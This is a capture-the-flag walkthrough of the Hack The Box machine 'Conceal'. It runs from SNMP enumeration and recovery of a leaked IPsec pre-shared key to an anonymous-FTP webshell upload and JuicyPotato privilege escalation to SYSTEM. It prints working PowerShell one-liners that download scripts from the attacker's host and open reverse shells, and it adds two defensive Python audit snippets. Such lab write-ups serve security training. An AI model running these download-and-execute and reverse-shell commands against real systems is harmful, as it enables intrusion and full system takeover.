Hack The Box walkthrough (Conceal) Writeup

nmap

TCP
nmap -sCTV -p- --stats-every 5s --min-rate 300 -oN nmap-tcp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.10.116 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 11 15:35:26 2023 -- 1 IP address (1 host up) scanned in 445.25 seconds

UDP
nmap -sU -p- --stats-every 5s --min-rate 300 10.10.10.116 > nmap-udp.log
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65533 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
500/udp open  isakmp

# Nmap done at Mon Dec 11 15:41:40 2023 -- 1 IP address (1 host up) scanned in 354.67 seconds

snmp community name brute force

sudo nmap -Pn -sU --script snmp-brute 10.10.10.116 --min-rate 300 --script-args snmp-brute.communitiesdb=snmp-default.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 17:00 JST
Nmap scan report for 10.10.10.116
Host is up (0.27s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 20.84 seconds

※snmp-default.txt was downloaded from https://github.com/SECFORCE/sparta/blob/master/wordlists/snmp-default.txt

snmpwalk

snmpwalk -c public -v1 10.10.10.116                     
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (4917278) 13:39:32.78
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2
iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3
iso.3.6.1.2.1.2.2.1.1.4 = INTEGER: 4
(rest omitted)
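The finding above is a credential pasted into an SNMP system-group string, readable by anyone who knows the default community. The following is an added example, not part of the writeup: it parses snmpwalk output lines (a constructed sample modelled on the output above) and flags sysDescr/sysContact/sysName/sysLocation values that carry a credential keyword or a 32-hex-character digest, the kind of check to run over your own SNMP agents.

```python
import re

# Constructed sample, modelled on the snmpwalk output shown above (system group only).
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
"""

# MIB-2 system group leaves that admins fill in by hand, so they are where secrets get pasted.
SYSTEM_GROUP = {
    "1.3.6.1.2.1.1.1.0": "sysDescr",
    "1.3.6.1.2.1.1.4.0": "sysContact",
    "1.3.6.1.2.1.1.5.0": "sysName",
    "1.3.6.1.2.1.1.6.0": "sysLocation",
}

LINE_RE = re.compile(r'^(?P<oid>\S+) = (?:(?P<type>\w+): )?(?P<value>.*)$')
HEX_RE = re.compile(r'\b[0-9a-fA-F]{32}\b')  # 32 hex chars: an MD5/NTLM-sized digest
KEYWORDS = ("password", "passwd", "psk", "secret")

def parse_walk(text: str):
    """Yield (oid, type, value) per line; 'iso.' is normalised to '1.' and quotes stripped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        value = m.group("value")
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        yield m.group("oid").replace("iso.", "1.", 1), m.group("type"), value

def find_leaked_secrets(text: str) -> list:
    """Return one finding per system-group STRING that carries a credential keyword or digest."""
    findings = []
    for oid, typ, value in parse_walk(text):
        name = SYSTEM_GROUP.get(oid)
        if typ != "STRING" or name is None:
            continue
        lowered = value.lower()
        hits = [k for k in KEYWORDS if k in lowered]
        digests = HEX_RE.findall(value)
        if hits or digests:
            findings.append({"object": name, "keywords": hits, "digests": digests})
    return findings
```

Running find_leaked_secrets(SAMPLE_WALK) returns a single finding for sysContact, with the keywords "password" and "psk" and the digest string; sysDescr and sysName pass clean.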

hash crack

The 32-character hash in the sysContact string from snmpwalk above was looked up on CrackStation; the recovered plaintext is the PSK used in ipsec.secrets below.

ike-scan

ike-scan -M 10.10.10.116        
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116	Main Mode Handshake returned
	HDR=(CKY-R=2eaf4593e68ea822)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
	VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
	VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
	VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
	VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
	VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
	VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.369 seconds (2.71 hosts/sec).  1 returned handshake; 0 returned notify

Editing the ipsec.conf and ipsec.secrets files

sudo nano /etc/ipsec.conf
# ipsec.conf - strongSwan IPsec configuration file

# basic configuration

config setup

conn %default
       inactivity=1h
       keyexchange=ikev1
       ike=3des-sha1-modp1024
       esp=3des-sha1
       authby=secret

conn conceal
       left=10.10.14.26
       leftprotoport=tcp
       right=10.10.10.116
       rightprotoport=tcp
       rightsubnet=10.10.10.116[tcp/%any]
       type=transport
       auto=add
※Each value follows the information obtained with ike-scan
sudo cat /etc/ipsec.secrets 
# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.10.116  %any : PSK "Dudecake1!"
※The PSK value is the one recovered with CrackStation
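The ike= line in ipsec.conf above is a direct transcription of the SA that ike-scan reported. As an added example (not the writeup's own code), the following parses that SA line, builds the matching strongSwan proposal string, and lists every parameter a reviewer would flag on a gateway offering it; the weakness reasons are my own annotations, and the algorithm maps cover only the names this host offered.

```python
import re

# Constructed sample: the SA line that ike-scan -M printed for this host (see above).
SA_LINE = "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)"

# ike-scan algorithm names -> strongSwan ipsec.conf keywords (only what this host offered).
ENC_MAP = {"3DES": "3des", "DES": "des"}
HASH_MAP = {"SHA1": "sha1", "MD5": "md5"}

# IKEv1 parameters a reviewer flags, and why. Keys are "Attr=Value" as ike-scan prints them.
WEAK = {
    "Enc=3DES": "64-bit block cipher (Sweet32); deprecated",
    "Enc=DES": "56-bit key; broken",
    "Hash=MD5": "collision-broken hash",
    "Hash=SHA1": "deprecated for new IKE deployments",
    "Group=1": "768-bit MODP; broken",
    "Group=2": "1024-bit MODP; Logjam-class strength",
    "Auth=PSK": "pre-shared key; only as strong as the secret (its hash was readable over SNMP here)",
}

def parse_sa(line: str) -> dict:
    """Return the Attr=Value pairs inside SA=( ... ), e.g. {'Enc': '3DES', 'Group': '2:modp1024', ...}."""
    m = re.search(r"SA=\((.*)\)", line)
    if not m:
        raise ValueError("no SA=( ... ) block in line")
    attrs = {}
    for token in m.group(1).split():
        key, _, val = token.partition("=")
        attrs[key] = val
    return attrs

def strongswan_ike(attrs: dict) -> str:
    """Build the ipsec.conf ike= proposal that matches the gateway's offer."""
    group = attrs["Group"].split(":")[1]      # "2:modp1024" -> "modp1024"
    return f"{ENC_MAP[attrs['Enc']]}-{HASH_MAP[attrs['Hash']]}-{group}"

def audit_sa(attrs: dict) -> list:
    """Return (parameter, reason) pairs for every weak choice in the offered SA."""
    tags = [f"{k}={attrs[k]}" for k in ("Enc", "Hash", "Auth") if k in attrs]
    if "Group" in attrs:
        tags.append("Group=" + attrs["Group"].split(":")[0])   # number only, "Group=2"
    return [(t, WEAK[t]) for t in tags if t in WEAK]

if __name__ == "__main__":
    sa = parse_sa(SA_LINE)
    print("ike=" + strongswan_ike(sa))
    for param, reason in audit_sa(sa):
        print(f"weak: {param}: {reason}")
```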

ipsec start

sudo ipsec start                
[sudo] kali のパスワード:
Starting strongSwan 5.9.12 IPsec [starter]...

ipsec up

sudo ipsec up conceal
generating QUICK_MODE request 3024468123 [ HASH SA No ID ID ]
sending packet: from 10.10.14.26[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.26[500] (188 bytes)
parsed QUICK_MODE response 3024468123 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{1}
CHILD_SA conceal{2} established with SPIs c628a505_i b76a7e0e_o and TS 10.10.14.26/32[tcp] === 10.10.10.116/32[tcp]
connection 'conceal' established successfully

nmap

nmap -sCV -p- --stats-every 5s --min-rate 300 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65523 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
(rest omitted)

http

gobuster

gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.116/ -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.116/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]

===============================================================
Finished
===============================================================

http://10.10.10.116/upload/

ftp anonymous

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52079|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> 

ftp file upload

cat test.txt 
upload OK!!

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||52115|)
125 Data connection already open; Transfer starting.
100% |**************************************|    13      158.69 KiB/s    --:-- ETA
226 Transfer complete.
13 bytes sent in 00:00 (0.03 KiB/s)
http://10.10.10.116/upload/
http://10.10.10.116/upload/test.txt

webshell upload

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put webshell.asp 
local: webshell.asp remote: webshell.asp
229 Entering Extended Passive Mode (|||52240|)
125 Data connection already open; Transfer starting.
100% |**************************************|  1412       19.23 MiB/s    --:-- ETA
226 Transfer complete.
※webshell.asp is downloaded from https://github.com/tennc/webshell/blob/master/asp/webshell.asp
http://10.10.10.116/upload/webshell.asp

reverse shell

powershell invoke-expression (New-Object Net.WebClient).DownloadString('http://10.10.14.26:8888/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 4444
※Send this command through the input form of webshell.asp
※Invoke-PowerShellTcp.ps1 is downloaded from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Listening with the python3 HTTP server

python3 -m http.server 8888
10.10.10.116 - - [17/Dec/2023 02:20:14] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

Listening with nc

nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 52870
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute

proof.txt

PS C:\Users\Destitute\Desktop> cat proof.txt
b1d83f0d1b2b2a99a93dbee0fcbfc8b6

privilege escalation

privilege check

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\> 

Upload JuicyPotato.exe and the .bat file

cat test.bat                                    
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26:8888/powercat.ps1');powercat -c 10.10.14.26 -p 5555 -e cmd"
※powercat.ps1 is downloaded from https://github.com/besimorhino/powercat/blob/master/powercat.ps1

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put test.bat 
local: test.bat remote: test.bat
229 Entering Extended Passive Mode (|||53549|)
125 Data connection already open; Transfer starting.
100% |**************************************|   147        1.86 MiB/s    00:00 ETA
226 Transfer complete.
147 bytes sent in 00:00 (0.34 KiB/s)
※Run the upload in binary mode (line endings and the like can otherwise be converted between operating systems)

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put JuicyPotato.exe 
local: JuicyPotato.exe remote: JuicyPotato.exe
229 Entering Extended Passive Mode (|||53529|)
125 Data connection already open; Transfer starting.
100% |**************************************|   339 KiB   48.61 KiB/s    00:00 ETA
226 Transfer complete.
347648 bytes sent in 00:07 (46.18 KiB/s)
※Run the upload in binary mode (line endings and the like can otherwise be converted between operating systems)

Running JuicyPotato

PS C:\inetpub\wwwroot> ./JuicyPotato.exe -l 443 -p test.bat -t * -c '{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}'
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 443
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Listening with the python3 HTTP server

python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.10.116 - - [17/Dec/2023 02:50:09] "GET /powercat.ps1 HTTP/1.1" 200 -

Listening with nc

nc -lnvp 5555                                                        
listening on [any] 5555 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 53777
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

proof.txt is in the usual place.